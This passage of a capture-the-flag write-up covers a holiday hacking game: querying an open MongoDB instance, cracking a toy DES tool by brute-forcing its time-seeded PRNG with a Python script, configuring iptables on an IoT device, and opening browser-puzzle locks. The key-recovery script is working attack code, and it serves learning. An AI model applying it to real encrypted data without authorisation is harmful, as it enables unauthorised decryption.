    <a href="https://docs.mongodb.com/manual/reference/command/listDatabases/#dbcmd.listDatabases">MongoDB Documentation</a>
  </div>
  <p>
    The first hurdle is getting into MongoDB by starting a mongo shell, as described 
    <a href="https://docs.mongodb.com/manual/mongo/">here</a>. The command is 
    <code>mongo --port &lt;pt&gt;</code>, where pt is the port on which the MongoDB 
    server is listening. One way to find out is <code>lsof -i</code>, which lists 
    which services are listening on which ports. However, the command seems not to be 
    installed.
  </p>
  <p>
    Some googling around shows that <b>ps</b> and <b>netstat</b> have helpful options.
    Here are the results from both:
  </p>
  <pre>
elf@0e894bf76469:~$ <span>ps -ef</span>
UID        PID  PPID  C STIME TTY          TIME CMD
elf          1     0  0 22:22 pts/0    00:00:00 /bin/bash
mongo        9     1  0 22:22 ?        00:00:03 /usr/bin/mongod --quiet --fork --port 12121 --bind_ip 127.0.0.1 --logpath=/tmp/mongo.log
elf         48     1  0 22:36 pts/0    00:00:00 ps -ef

elf@0e894bf76469:~$ <span>netstat -ltnp</span>
(No info could be read for "-p": geteuid()=1001 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:12121         0.0.0.0:*               LISTEN      -      </pre>
  <p>Starting the mongo shell is now possible</p>
  <pre>
elf@0e894bf76469:~$ <span>mongo --port 12121</span>
    MongoDB shell version v3.6.3
    connecting to: mongodb://127.0.0.1:12121/
    MongoDB server version: 3.6.3
    Welcome to the MongoDB shell.
    For interactive help, type "help".
    For more comprehensive documentation, see
            http://docs.mongodb.org/
    Questions? Try the support group
            http://groups.google.com/group/mongodb-user
    Server has startup warnings: 
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten] 
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten] 
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten] 
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is 'always'.
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten] **        We suggest setting it to 'never'
    2020-01-11T22:22:16.260+0000 I CONTROL  [initandlisten]
    &gt;</pre>
  <p>
    In MongoDB, the data is organized in different databases, each of 
    which can have several collections. A collection is essentially 
    a table of documents, which can be completely different: no common
    schema or common type is enforced. There are 4 databases in the system:
  </p>
  <pre>
<span>&gt; show dbs</span>
    admin  0.000GB
    elfu   0.000GB
    local  0.000GB
    test   0.000GB</pre>
  <p>
    To see the collections in a database, use <code>use &lt;db name&gt;</code>
    followed by <code>show collections</code>.
  </p>
  <table class="bordered">
    <tr><th>database</th><th>collection</th></tr>
    <tr><td>admin</td><td>system.version</td></tr>
    <tr><td><mark>elfu</mark></td><td>bait<br>chum<br>line<br>metadata<br><mark>solution</mark><br>system.js<br>tackle<br>tincan</td></tr>
    <tr><td>local</td><td>startup_log</td></tr>
    <tr><td>test</td><td>redherring</td></tr>
  </table>
  <p>
    To list the objects in a collection foo, the command is <code>db.foo.find()</code>. 
    Collection <b>solution</b> in <b>elfu</b> just begs to be looked at. All the other 
    collections can be investigated, but I didn't find anything interesting except fish. 
    Just like the terminal opening screen said ...
  </p>
  <pre>
<span>&gt; use elfu</span>
    switched to db elfu
<span>&gt; db.solution.find()</span>
    { "_id" : "You did good! Just run the command between the stars: 
      ** db.loadServerScripts();displaySolution(); **" }
<span>&gt; db.loadServerScripts();displaySolution();</span>

            .
         __/ __
              /
         /.'o'. 
          .o.'.
         .'.'o'.
        o'.o.'.*.
       .'.o.'.'.*.
      .o.'.o.'.o.'.
         [_____]
          ___/

    Congratulations!!</pre>

  <div class="quote">
    <div class="name">Holly Evergreen:</div>
    Woohoo! Fantabulous! I'll be the coolest elf in class.
    On a completely unrelated note, digital rights management can bring a hacking elf down.
    That ElfScrow one can really be a hassle.
    It's a good thing Ron Bowes is giving a talk on reverse engineering!
    That guy knows how to rip a thing apart. It's like he breathes opcodes!
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://youtu.be/obJdpKDpFBA">Reversing Crypto the Easy Way</a>
  </div>

  <h3 id="obj10_2">II) Recover Cleartext Document</h3>
  <div class="quote">
    <div class="name">Krampus:</div>
    Wow! We’ve uncovered quite a nasty plot to destroy the holiday season.
    We’ve gotta stop whomever is behind it!
    I managed to find this protected document on one of the compromised machines in our environment.
    I think our attacker was in the process of exfiltrating it.
    I’m convinced that it is somehow associated with the plan to destroy the holidays. Can you decrypt it?
    There are some smart people in the NetWars challenge room who may be able to help us.
  </div>
  <p>
    So ElfU has its own homemade encryption tool, <b>elfscrow.exe</b>. What could 
    possibly go wrong ... simply running it gives usage instructions:
  </p>
  <pre style="font-size: 10pt;">
&gt; <span>./elfscrow.exe</span>
    Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

    * WARNING: You're reading from stdin. That only partially works, use at your own risk!

    ** Please pick --encrypt or --decrypt!

    Are you encrypting a file? Try --encrypt! For example:

      .\elfscrow.exe --encrypt &lt;infile&gt; &lt;outfile&gt;

    You'll be given a secret ID. Keep it safe! The only way to get the file
    back is to use that secret ID to decrypt it, like this:

      .\elfscrow.exe --decrypt --id=&lt;secret_id&gt; &lt;infile&gt; &lt;outfile&gt;

    You can optionally pass --insecure to use unencrypted HTTP. But if you
    do that, you'll be vulnerable to packet sniffers such as Wireshark that
    could potentially snoop on your traffic to figure out what's going on!</pre>
  <pre style="font-size: 10pt;">
&gt; <span>./elfscrow.exe --encrypt infile outfile</span>
    Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

    Our miniature elves are putting together random bits for your secret key!

    Seed = <mark>1577528082</mark>
    Generated an encryption key: <mark>b79fab2de37f1ddf</mark> (length: 8)
    Elfscrowing your key...
    Elfscrowing the key to: elfscrow.elfu.org/api/store

    Your secret id is fa9e251b-7d80-4f29-bcd0-7d009c8ff7b5 - Santa Says, don't share that key with anybody!
    File successfully encrypted!

        ++=====================++
        ||                     ||
        ||      ELF-SCROW      ||
        ||                     ||
        ||                     ||
        ||                     ||
        ||     O               ||
        ||     |               ||
        ||     |   (O)-        ||
        ||     |               ||
        ||     |               ||
        ||                     ||
        ||                     ||
        ||                     ||
        ||                     ||
        ||                     ||
        ++=====================++</pre>
  <p>
    The tool is using a <b>key escrow</b> system to handle keys. 
    Definition by Wikipedia:
    <div style="margin-left: 40px;"><em>
      Key escrow (also known as a “fair” cryptosystem) is an arrangement in which the keys needed 
      to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized 
      third party may gain access to those keys. These third parties may include businesses, who 
      may want access to employees' private Communications, or Governments, who may wish to be 
      able to view the contents of encrypted communications.
    </em></div><br>
    After encryption, the key is sent to an escrow server, and the receiver of a message 
    can access the key there if he presents the correct secret ID. I find it difficult to 
    understand the use of escrow here. Instead of the key, an ID has to be shared secret 
    between sender and receiver. Unless the escrow server is not openly accessible, this 
    does not change the security of the system. Perhaps Santa is the nosey sort ... but 
    if Santa had special access to all the keys on the Elfscrow server, he wouldn't need me 
    to decrypt the message.
  </p>
  <p>
    To determine the encryption method, the infile is loaded with ASCII strings of 
    different length, and the effect on the outfile is observed, as explained 
    in the recommended talk.  
  </p>
  <ul>
    <li>key size: 8 byte</li>
    <li>block size: 8 byte</li>
    <li>blocks are different for periodic input</li> 
  </ul>
  <p>
    So a likely candidate is <b>DES in CBC mode</b>, with hardcoded or zero IV.
    To find out more, I decompiled the executable with IDA, including the debug 
    symbols provided in elfscrow.dbg to make the code more readable.
  </p>
  <p>
    A good first step is to check the text messages in the <b>.rdata</b> memory segment
    starting at 0x404120. Some messages are quite revealing. 
    <code>0x4047D8 CryptImportKey failed for DES-CBC key</code> 
    confirms the initial observations regarding cryptographic method. To verify
    that there are no additional tricks, I checked the elfscrow encryption of a test file 
    against an online DES encrypter (e.g. cyberchef) with IV=0 and got identical cyphertext.
  </p>
  <pre>
Test:
    Seed:   1577568020
    key:    2cfdfb1d1409c91f
    PT:     41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    CT:     41 9C 5A 2B B0 40 D1 95 F2 84 6B CB 0D 2C 3A 40 3B 57 1E 6D 2D 1B 06 40</pre>
  <p>
    DES is no longer considered secure, but that doesn't mean it is possible to break 
    without massive resources. We have an encrypted message without key, so there are
    two options: break into the escrow server, or find a flaw in key generation.
    Key generation is handled by the subroutine <b>generate_key</b> at 0x401DF0. 
  </p>
  <img src="img/obj_10/generate_key.png">
  <p>
    First, the subroutine <b>time</b> is called to generate a <code>seed</code>. Internally,
    this calls _time64, which is the unix system (or epoch) time in seconds sincs 1.1.1970. 
  </p>
  <img src="img/obj_10/time.png">
  <p>
    The subroutine <b>super_secure_srand</b> prints this seed (very convenient!) and 
    copies it to the variable <code>state</code> at 0x40602C.
  </p>
  <img src="img/obj_10/super_secure_srand.png">
  <p>
    The 8 byte key is generated one byte at a time by repeatedly calling the subroutine
    <b>super_secure_random</b>, which performs an algebraic operation on the variable 
    <code>state.</code>. By searching for the constants used, this turns out to be the 
    pseudo random number generator used by Visual C++.
  </p>
  <img src="img/obj_10/super_secure_random.png">
  <p>
    We are in luck: the key generator is seeded by current time, which makes it 
    predictable. To verify the key generation process, I wrote a python script:
  </p>
  <pre class="prettyprint lang-python">
  def gen_key(key_seed):
      state = key_seed
      _key = 0
      for key_pos in range(8):
          state = state * 0x343FD + 0x269EC3
          key_byte = (state >> 0x10) & 0xFF
          _key = _key * 0x100 + key_byte
      return _key

  seed = 1577528082
  key = gen_key(seed).to_bytes(8, byteorder='big')
  print("Seed: {}\nKey: {}".format(seed, hexlify(key)))</pre>
  <p>
    Starting with the seed 1577528082, the generated key b79fab2de37f1ddf is the
    same as the one generated by elfscrow.exe above. Check! 
  </p>
  <p>
    Now that the encryption method has been confirmed, lets abuse it. We know that 
    the encrypted file was generated on December 6, 2019, between 7pm and 9pm UTC. 
    This means that the seed must lie in the range 1575658800 to 1575666000. To 
    break the cipher, one simply has to try out all keys from this range of seeds
    until the file decrypts to something sensible. Because the filename ends in .pdf.enc,
    the original is probably PDF, and so "something sensible" means starting with "%PDF".
    In order to save time, I only used the initial 16 bytes of the encrypted file in the 
    script below:
  </p>
  <pre class="prettyprint lang-python">
  from Cryptodome.Cipher import DES
  from Cryptodome.Util.Padding import pad, unpad
  from binascii import hexlify
  from calendar import timegm
  import time
  import datetime

  def gen_key(key_seed):
      state = key_seed
      _key = 0
      for key_pos in range(8):
          state = state * 0x343FD + 0x269EC3
          key_byte = (state >> 0x10) & 0xFF
          _key = _key * 0x100 + key_byte
      return _key

  # find timestamps for starting and ending dates
  d_start = datetime.datetime(2019, 12, 6, 19)
  d_end = datetime.datetime(2019, 12, 6, 21)
  t_start = timegm(d_start.timetuple())
  t_end = timegm(d_end.timetuple())

  for seed in range(t_start, t_end):
      key = gen_key(seed).to_bytes(8, byteorder='big')
      # print("Seed: {}\nKey: {}".format(seed, hexlify(key)))

      ct = b'\x5D\xBD\xCE\xDC\x49\x4A\x74\x43\xF5\x77\xF2\x7F\x84\x05\x14\x1A'
      cipher = DES.new(key, DES.MODE_CBC, iv=(0).to_bytes(8, byteorder='big'))
      pt = cipher.decrypt(ct)
      if pt.startswith(b'%PDF'):
          print(pt)
          print("Seed: {}\nKey: {}".format(seed, hexlify(key)))</pre>
  <p>The output:</p>
  <pre>
    b'%PDF-1.3\n%\xc4\xe5\xf2\xe5\xeb\xa7'
    Seed: 1575663650
    Key: b'<mark>b5ad6a321240fbec</mark>'</pre>
  <p>
    We have a key and can decrypt the mystery file by conventional means
    (elfscrow will not work, because we have no ID for the server, "only" the key).
    Out comes <b>ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf</b>, an 8 page
    guide on the Super Sled-O-Matic. Lets quickly head to the sleigh shop!
  </p>
  <div class="answer"><b>Answer</b>: Machine Learning Sleigh Route Finder</div>
  <img src="img/obj_10/super_sledomatic.png" class="centered" width="400px">
  <img src="img/obj_10/super_santa.png" class="centered">

  <h2 id="obj11">Objective 11: Open the Sleigh Shop Door</h2>
  <div class="objective">
    Difficulty:5<br>
    Visit Shinny Upatree in the Student Union and help solve 
    their problem. What is written on the paper you retrieve for Shinny?
    <em>
      For hints on achieving this objective, please visit the 
      Student Union and talk with Kent Tinseltooth.
    </em>
  </div>

  <h3 id="obj11_1">I) Kent Tinseltooth</h3>
  <div class="terminal">
    <img src="img/obj_11/kent.png">
  </div>
  <div class="quote">
    <div class="name">Kent Tinseltooth:</div>
    OK, this is starting to freak me out!<br>
    Oh sorry, I'm Kent Tinseltooth. My Smart Braces are acting up.
    Do... Do you ever get the feeling you can hear things? Like, voices?
    I know, I sound crazy, but ever since I got these... Oh!<br>
    Do you think you could take a look at my Smart Braces terminal?
    I'll bet you can keep other students out of my head, so to speak.
    It might just take a bit of Iptables work.
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://upcloud.com/community/tutorials/configure-iptables-centos/">Iptables</a>
  </div>
  <p>
    Oh no! Kents IOT braces have been hacked, and now they speak to him. 
    Who could possibly be evil enough to do such a thing? We won't find out
    until later, but can try to help Kent in the meantime. His latest dialogue is 
    quite ominous:
  </p>
  <pre>
  Inner Voice: Kent. Kent. Wake up, Kent.
  Inner Voice: I'm talking to you, Kent.
          Kent: Who said that? I must be going insane.
          Kent: Am I?
  Inner Voice: That remains to be seen, Kent. But we are having a conversation.
  Inner Voice: This is Santa, Kent, and you've been a very naughty boy.
          Kent: Alright! Who is this?! Holly? Minty? Alabaster?
  Inner Voice: I am known by many names. I am the boss of the North Pole. 
                Turn to me and be hired after graduation.
          Kent: Oh, sure.
  Inner Voice: Cut the candy, Kent, you've built an automated, 
                machine-learning, sleigh device.
          Kent: How did you know that?
  Inner Voice: I'm Santa - I know everything.
          Kent: Oh. Kringle. *sigh*
  Inner Voice: That's right, Kent. Where is the sleigh device now?
          Kent: I can't tell you.
  Inner Voice: How would you like to intern for the rest of time?
          Kent: Please no, they're testing it at <mark>srf.elfu.org</mark> using 
                <mark>default creds</mark>, but I don't know more. It's classified.
  Inner Voice: Very good Kent, that's all I needed to know.
          Kent: I thought you knew everything?
  Inner Voice: Nevermind that. I want you to think about what you've 
                researched and studied. From now on, stop playing with 
                your teeth, and floss more.
  *Inner Voice Goes Silent*
          Kent: Oh no, I sure hope that voice was Santa's.
          Kent: I suspect someone may have hacked into my IOT teeth braces.
          Kent: I must have forgotten to configure the firewall...
          Kent: Please review <mark>/home/elfuuser/IOTteethBraces.md</mark> and 
                help me configure the firewall.
          Kent: Please hurry; having this ribbon cable on my teeth is uncomfortable.
  </pre>
  <p>
    The readme file at <b>/home/elfuuser/IOTteethBraces.md</b> reveals that Kents braces
    use the Linux kernel firewall, and gives the exact configuration to make them safe.
  </p>
  <pre>
  # ElfU Research Labs - Smart Braces
  ### A Lightweight Linux Device for Teeth Braces
  ### Imagined and Created by ElfU Student Kent TinselTooth
      This device is embedded into one's teeth braces for easy management and monitoring of dental 
      status. It uses FTP and HTTP for management and monitoring purposes but also has SSH for 
      remote access. Please refer to the management documentation for this purpose.
  ## Proper Firewall configuration:
      The firewall used for this system is `iptables`. The following is an example of how to set a 
      default policy with using `iptables`:
      ```
      sudo iptables -P FORWARD DROP
      ```
      The following is an example of allowing traffic from a specific IP and to a specific port:
      ```
      sudo iptables -A INPUT -p tcp --dport 25 -s 172.18.5.4 -j ACCEPT
      ```
  A <mark>proper configuration</mark> for the Smart Braces should be exactly:
      1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
      2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
      3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
      4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
      5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
      6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.
  </pre>
  <p>
    The firewall is configured with the command <code>iptables</code>, the usage of
    which is explained in great detail in the tutorial linked by the hint. Adapting 
    the examples provided there:
  </p>
  <ol>
    <li>
      <em>Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains:</em>
      <pre>
sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
sudo iptables -P FORWARD DROP
      </pre>
    </li>
    <li>
      <em>Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED 
      on the INPUT and the OUTPUT chains:</em> exactly as explained in the tutorial
      <pre>
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
      </pre>
    </li>
    <li>
      <em>Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access 
      the local SSH server (on port 22):</em> The shorthand <code>--dport ssh</code> from
      the tutorial did not seem to work in the terminal, the port number had to be used.
      <pre>
sudo iptables -A INPUT -p tcp --dport 22 -s 172.19.0.225 -j ACCEPT
      </pre>
    </li>
    <li>
      <em>Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80:</em>
      <pre>
sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
      </pre>
    </li>
    <li>
      <em>Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80:</em>
      <pre>
sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
      </pre>
    </li>
    <li>
      <em>Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface:</em>
      The "lo" here stands for localhost. Consulting the man pages shows that there is 
      a parameter -i to specify an interface.
      <pre>
sudo iptables -A INPUT -i lo -j ACCEPT
      </pre>
    </li>
  </ol>
  <p>
    If these settings are done before Kent looses patience with the cable connecting 
    his braces, a success message appears on the terminal before it is killed by Kent 
    ripping out the cable. A relieved Kent provides a truckload of hints helping 
    with Shinny Upatree's locked crate, and a pointer at a very good hint in 
    Minty Candycane's <a href="#obj07_1">Holiday Hack Trail</a> game from objective 7.
    Which meant, of course, that I had to beat the game again to get that hint ... 
  </p>
  <p>
    <div class="note"> Using <code>iptables -L</code> to list all currently 
    defined rules shows there are none at the beginning. All network communication was 
    permitted. No wonder the braces were a target! There are 3 predefined rule chains 
    in the filter table: INPUT (destined for host), OUTPUT (originating from host) and 
    FORWARD (just passing through). Default policy DROP means that all
    packets without an explicit rule are thrown away. Usually, the OUTPUT chain would 
    be configured to ACCEPT all by default and then to exclude specific targets, but for 
    IOT a more drastic approach is appropriate. ESTABLISHED and RELATED are connection 
    states accessible through the module conntrack, and the rules permit packets part of 
    or related to an already established connection. Incoming SSH traffic is restricted 
    to a specific IP address, and free access is given to incoming ftp (port 21) and 
    http (port 80) traffic. Finally, inbound traffic on the local loopback interface 
    (localhost) has to be permitted, as a number of systems would be broken otherwise.
  </div></p>
  <div class="quote">
    <div class="name">Kent Tinseltooth:</div>
    Oh thank you! It's so nice to be back in my own head again. Er, alone.<br>
    By the way, have you tried to get into the crate in the Student Union? 
    It has an interesting set of locks.
    There are funny rhymes, references to perspective, and odd mentions of eggs!
    And if you think the stuff in your browser looks strange, 
    you should see the page source...
    Special tools? No, I don't think you'll need any extra tooling for those locks.
    BUT - I'm pretty sure you'll need to use Chrome's developer tools for that one.
    Or sorry, you're a Firefox fan?
    Yeah, Safari's fine too - I just have an ineffible hunger for a physical Esc key.
    Edge? That's cool. Hm? No no, I was thinking of an unrelated thing.
    Curl fan? Right on! Just remember: the Windows one doesn't like double quotes.
    Old school, huh? Oh sure - I've got what you need right here...<br>
    ...<br>
    ...<br>
    And I hear the Holiday Hack Trail game will give hints on the last screen if 
    you complete it on Hard.
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://developers.google.com/web/tools/chrome-devtools">Chrome dev tools</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://developer.mozilla.org/en-US/docs/Tools">Firefox dev tools</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://developer.apple.com/safari/tools/">Safari dev tools</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://docs.microsoft.com/en-us/microsoft-edge/devtools-guide/console">Edge dev tools</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://curl.haxx.se/docs/manpage.html">Curl dev tools</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://xkcd.com/325/">Lynx dev tools</a>
  </div>
  <p>
    The "old school" option refers to the purely text-based Lynx browser, 
    dating back to 1992. Fond memories ... :-) Good luck with that! 
    Quite appropriately, the link leads to XKCD with an example of what 
    might happen if you open the wrong crate.
  </p>

  <h3 id="obj11_2">II) Open the Sleigh Shop Door</h3>
  <div class="terminal" style="row-gap: 0;">
    <img src="img/obj_11/crate_1.png" style="width: 400px;">
    <img src="img/obj_11/crate_2.png" style="width: 400px;">
    <img src="img/obj_11/crate_3.png" style="width: 400px;">
    <img src="img/obj_11/crate_4.png" style="width: 400px;">
    <img src="img/obj_11/crate_5.png" style="width: 400px;">
  </div>
  <div class="quote">
    <div class="name">Shinny Upatree:</div>
    <div>
      Psst - hey!<br>
      I'm Shinny Upatree, and I know what's going on!
      Yeah, that's right - guarding the sleigh shop has made me privvy 
      to some serious, high-level intel.
      In fact, I know WHO is causing all the trouble.
      Cindy? Oh no no, not that who. And stop guessing - you'll never figure it out.
      The only way you could would be if you could break into
      <a href="https://crate.elfu.org/">my crate</a>, here.
      You see, I've written the villain's name down on a piece of 
      paper and hidden it away securely!
    </div>
  </div>
  <p>Hints from <a href="#obj07_1">Holiday Hack Trail</a>:</p>
  <ol>
    <li>When I'm down, my F12 key consoles me</li>
    <li>Reminds me of the transition to the paperless naughty/nice list...</li>
    <li>Like a present stuck in the chimney!  It got sent...</li>
    <li>We keep that next to the cookie jar</li>
    <li>My title is toy maker the combination is 12345</li>
    <li>Are we making hologram elf trading cards this year?</li>
    <li>If we are, we should have a few fonts to choose from</li>
    <li>The parents of spoiled kids go on the naughty list...</li>
    <li>Some toys have to be forced active</li>
    <li>Sometimes when I'm working, I slide my hat to the left and move odd things onto my scalp!</li>
  </ol>
  <p>
    The "crate" has 10 locks, each of which comes witgh a riddle, a hint and an 
    input field for 8 alphanumeric characters. The obfuscated HTML calls an even 
    more obfuscated JaavScript to weave some magic. Deobfuscating that looks 
    possible, but way too painful for cheerful holiday hacking. We are supposed 
    to use the developer tools, so lets do that.
  </p>
  <h4>
    Lock 1:<br> <em>You don't need a clever riddle <br>
      to open the console and scroll a little.</em>
  </h4>
  <p>
    Use F12 to open the developer tools, and go to the <b>Console</b> tab. 
    Scrolling right up reveals the key.
  </p>
  <img src="img/obj_11/sol_1.png" width="600px">
   <h4>
    Lock 2:<br> <em>Some codes are hard to spy, <br>
      perhaps they'll show up on pulp with dye?</em>
  </h4>
  <p>
    In the page source, find the second lock using the inspector. The 
    code for the lock shows up as part of the instructions. It appears that
    the code is printed on zero dimensions when rendered on screen, a CSS trick.
    This is why the hints talk about paper: if the page is printed out on 
    actual paper, the code would appear. <br>
    The reason can be found in the short 
    stylesheet <code>/css/print.css</code>, which specifies that the 
    style libra strong is not displayed, only printed.  
  </p>
  <p>
    <div class="note"> replace <code>none</code> with <code>block</code> to
    show the code.
  </div></p>
  <pre>
    .libra strong {
      display: none;
    }

    @media print {
      .libra strong {
        display: block;
      }
    }</pre>
    <img src="img/obj_11/sol_2.png" width="600px">
  <h4>
    Lock 3:<br> <em>This code is still unknown; <br>
      it was fetched but never shown.</em>
  </h4>
  <p>
    After the page is set up, a PNG is repeatedly loaded. 
    This PNG (which is not shown on the page) has the code. 
    It can be found by opening the <b>Network Monitor</b> tab 
    and looking for repeated fetches of an image.
  </p>
  <img src="img/obj_11/sol_3.png" width="600px">
  <h4>
    Lock 4:<br> <em>Where might we keep the things we forage? <br>
      Yes, of course: Local barrels!</em>
  </h4>
  <p>
    Hmm, "storage" would rhyme much better than "barrels". 
    The code can be found in the local storage under the 
    <b>Storage Inspector</b> tab, with 
    3 barrels as a key. Right next to the cookies, as the hint states.
  </p>
  <img src="img/obj_11/sol_4.png" width="600px">
  <h4>
    Lock 5:<br> <em>Did you notice the code in the title? <br>
      It may very well prove vital.</em>
  </h4>
  <p>
    All kinds of ideas of how to see the title are provided 
    in the hints. I just scrolled up in the Page Inspector tab.
  </p>
  <p>
    <div class="note"> The spaces mean that the code is not visible 
    as part of the title in the browser window normally.
  </div></p>
  <img src="img/obj_11/sol_5.png" width="600px">
  <h4>
    Lock 6:<br> <em>In order for this hologram to be effective, <br>
      it may be necessary to increase your perspective.</em>
  </h4>
  <p>
    Finding the hologram in the page source using the inspector
    exposes the characters appearing in the hologram, but not 
    their order. The <b>perspective property</b> of .hologram in the style 
    sheet determines how distant a 3D object is from the viewer. 
    This can be edited directly in the CSS viewer. Choosing a 
    very high value such as 50000px makes the code completely readable.
  </p>
  <img src="img/obj_11/sol_6.png" width="600px">
  <h4>
    Lock 7:<br> <em>The font you're seeing is pretty slick, <br>
      but this lock's code was my first pick.</em>
  </h4>
  <p>
    The font family with the code can be tracked down using the 
    <b>Style Editor</b> tab. The font-family lists a sequence of fonts
    <ol>
      <li>&lt;code&gt;</li>
      <li>'Beth Ellen'</li>
      <li>cursive</li>
    </ol>
    The first font name representing the code can of course not be found, 
    so it is ignored and the second font (Beth Ellen) chosen. The font family 
    definition is in the header of the document.
  </p>
  <img src="img/obj_11/sol_7.png" width="600px">
  <h4>
    Lock 8:<br> <em>In the event that the .eggs go bad, <br>
      you must figure out who will be sad.</em>
  </h4>
  <p>
    Looking up the lock instructions in the inspector, it appears that the 
    span.eggs style is tied to an event, which is defined as part 
    of the obfuscated JavaScript magic. Clicking on the event leads to 
    its description, which includes the code: "VERONICA" will be sad when 
    the .eggs spoil.
  </p>
  <img src="img/obj_11/sol_8.png" width="800px">
  <h4>
    Lock 9:<br> <em>This next code will be unredacted, <br>
      but only when all the chakras are :active.</em>
  </h4>
  <p>
    One can simply chase up the definition of .span.chakra in the 
    stylesheet. The code can be read from there. Each chakra represents a word 
    in the hint (next, unredacted, only, when, chakras), which, when clicked, shows 
    part of the code. This is the function of the :active pseudoclass  
  </p>
  <p>
    <div class="note"> Use the dev tools to <b>force</b> the element state of 
    each chakra to active. This shows the complete code "3ZYTN7KD".
  </div></p>
  <img src="img/obj_11/sol_9_chakras.png" width="400px">
  <h4>
    Lock 10:<br> <em>Oh, no! This lock's out of commission! <br>
      Pop off the cover and locate what's missing.</em>
  </h4>
  <div class="hangright">
    <img src="img/obj_11/lock_10-open.png" width="400px">
    <img src="img/obj_11/lock_10-completed.png" width="200px">
  </div>
  <p>
    This is the most complex lock. It requires several steps to open:
  </p>
  <ol>
    <li>
      Move the cover: change left position of .lock.10.cover to 400px in the CSS
    </li>
    <img src="img/obj_11/sol_10_1.png" width="500px">
    <li>
      Check the open circuit board. The code <b>KD29XJ37</b> is printed in the bottom right corner. 
      Enter this code in the display.
    </li>
    <li>
      Try to press the button on the board. Nothing happens, and the error message "missing maccaroni!"
      appears in the console. 
    </li>
    <li>
      Search for "macaroni" in the Page Inspector. As part of lock 7, 
      <code>&lt;div class="component macaroni" data-code="A33"&gt;&lt;/div&gt;</code>
      is found. Copy and paste this behind the cover into the container 
      <code>&lt;div class="lock 10 unlocked"&gt;</code>. If it was coppied to the 
      correct place, a macaroni appears on the circuit board.
    </li>
    <img src="img/obj_11/sol_10_2.png" width="400px">
    <li>
      Two more items need to be added this way: a miising gnome and a cotton swab.
      <code>&lt;div class="component gnome" data-code="XJ0"&gt;&lt;/div&gt;</code>
      <code>&lt;div class="component swab" data-code="J39"&gt;&lt;/div&gt;</code>
    </li>
    <li>
      The lock is now enabled. Press the button to open it.
    </li>
  </ol>
  <p>
    When all 10 locks have been opened, a letter with the name of the villain 
    appears: <b>The Tooth Fairy</b>! 
  </p>
  <img src="img/obj_11/solved.png" class="centered" width="500px">
  <p>
    In the console, a challenge appears:
  </p>
  <div class="framed">
    Well done! Here's the password: <br>
    The Tooth Fairy <br>
    You opened the chest in 1447.023 seconds <br>
    Well done! Do you have what it takes to Crack <br>
    the Crate in under three minutes? <br>
    Feel free to use this handy image to share your score!<br>
  </div>
  <p>
    After a few tries, I got down to 4 minutes. 3 minutes sounds very challenging, 
    unless one is seriously awake or uses javascript to help fill some positions 
    automatically. To be further investigated if there is enough time before 
    the deadline ... 
  </p>
  <p><div class="answer"><b>Answer</b>: The Tooth Fairy</div></p>
  <div class="quote">
    <div class="name">Shinny Upatree:</div>
    Wha - what?? You got into my crate?!
    Well that's embarrassing...
    But you know what? Hmm... If you're good enough to crack MY security...
    Do you think you could bring this all to a grand conclusion?
    Please go into the sleigh shop and see if you can finish this off!
    Stop the Tooth Fairy from ruining Santa's sleigh route!
  </div>
  
  <h2 id="obj12">Objective 12: Filter Out Poisoned Sources of Weather Data</h2>
  <div class="objective">
    Difficulty:4<br>
    Use the data supplied in the 
    <a href="https://downloads.elfu.org/http.log.gz">Zeek JSON logs</a> 
    to identify the IP addresses of attackers poisoning Santa's 
    flight mapping software. 
    <a href="https://srf.elfu.org">
      Block the 100 offending sources of information to guide Santa's sleigh
    </a> through the attack. Submit the Route ID ("RID") success value 
    that you're given. 
    <em>
      For hints on achieving this objective, please visit the 
      Sleigh Shop and talk with Wunorse Openslae.
    </em>
  </div>

  <h3 id="obj12_1">I) Help Wunorse Openslae</h3>
  <div class="terminal">
    <img src="img/obj_12/wunorse.png">
  </div>
  <div class="quote">
    <div class="name">Wunorse Openslae:</div>
    Wunorse Openslae here, just looking at some Zeek logs.
